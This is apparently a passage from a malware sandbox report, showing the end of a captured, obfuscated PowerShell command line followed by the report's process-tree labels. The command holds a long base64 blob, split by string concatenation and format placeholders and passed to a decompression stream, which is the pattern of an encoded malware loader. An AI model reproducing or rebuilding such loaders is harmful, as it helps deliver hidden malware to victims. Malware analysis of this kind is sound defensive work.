1}mfEHjy3xAn+eJrJnfl{1}h4LI64jE{0}Kn{0}UtKJi{1}OZY8OgA{1}5{1}VJaS{1}+A'+'a4klsHxZ+1VckUQU2s8SVMzW1OvcWTge/Cn/vcvql+klKvs7lFljQkrUOIA+pmhFVfCgpZMnKEpJSJDcBFNX{0}aIF6LMOJjIWGW3PhB7Tqg4puunlDmkQi5EN'+'gYvIKYF753Jo2cmu+FBgkAvXQMZM0tIU1IJn1KjUO2uxyDUL7JcB{1}XlVECeeoWFZNgRryigsKYnpZQIvjxM//krpE{1}QV0ci8zcovB3PE/7NnkYiyhxIbCAgWVuiUsxk5AUlS71iH4{1}qZ/tn38Rk'+'CZmDPIHLO0gIDAjgTCFpEsErgI1CiWTiF6{1}ZSQAiWPZa'+'DPsQ5E45ciRXdgnXv41P7NcSIkvkckgeeYlhNtkXBQVm0YCqpBEWTLsfzjxY/VJvWlG5'+'BQdNcuxuX4QMgly25vVuaTpCaIjIJEAMNoRD3Qc'+'k4t6WmrUd+UhHSF4Zq2uSYm{0}oZXeHl4D3qmxfN{0}3qT8SGg8MtxmPOu0Gont/7zYGyPVuPHJlgtyYar0G8vRbqun1latrFurCnD+jFd{0}H3mC8cpk2anXL5izW6L7rSFupDbde7{0}5qqFarD2vaBuCTOhvQCej+sQ/fUFOHfb0X61qPXd80J/dO'+'tX3nsG653l4'+'tHR6bF7NWuVy+'+'8nDnnHlI5'+'16VJdiecKvrBnq5bBuesKaVgTV{0}vzqe03KuLrDzGM/MRqW/Rv6ntre{0}DyY7r2b4Fhv7hoUSoxX7NtgZrMeXva5fHcDYDWcXQ8tNjObGn1TtNa42dsYaPRot+V77k4Ad7py7HWk2zgeH+h51/As7DMLylW1Nq7{1}FPnCi1xEa0p30o18dCLsyCe67k/XYaYcD6+'+'YBBzezGWs/zqbtyaTl183OauQifYzb5CZs3Jcrs7AzrfrISOi1PJNdGTh4KOz+eleu3N0{0}NNkV{0}1sGQr3Qx/5kjFdXDu7anZCDrj2QOD'+'i4qXU6XZCf3SJvMuFUB/nO6rrRu'+'vXB15Hn1'+'rglHexsEUZojABTeBFqD7jzaWKdL8v2BvamxLuFdR/WLDv{1}ge0'+'hLV857X3XGtG{0}q+/rYJ/Ys32lzDFEqPz5+t{1}41B8NieEa1fvra22ImpeNvkPtgKMpxOodEHk+paGoVRc5fH5DRrLgv32T+6xX+fgZoV{0}raAaO4hVmQHToVFnFafOofWo+I06lhqoeLzEbEoWEQd+Hm0GWqIgx7sred2xT0HfTbiib87R3dOylr4LyTbD{1}1BOzqQ'+'8f7sBLSH2ZlqU+CX2xKmqPNU2DZqY{0}avVjl'+'v/82Zp8e1CPxoqyHaboZObZ0TxYpEtFVX8{0}YHDvEVB+X4fsNfRg7{1}2USyjfaQ2TGOqcs+cIZkf7RornCAJ0FTj+XF56UraAjTPyAJVW3gme3zFy7qb2a+lzqsYr+PH+jT5Pc/+{1}+lOU0oonhH6Y/37iWS/7hRg4mAqQNKGvMJJedl6G4pQ0z+IM8YGMWJ4e+R{0}gmIizAd{1}pj63tL7bfhbF{0}DAAA')-f'9','w')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

            2352

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf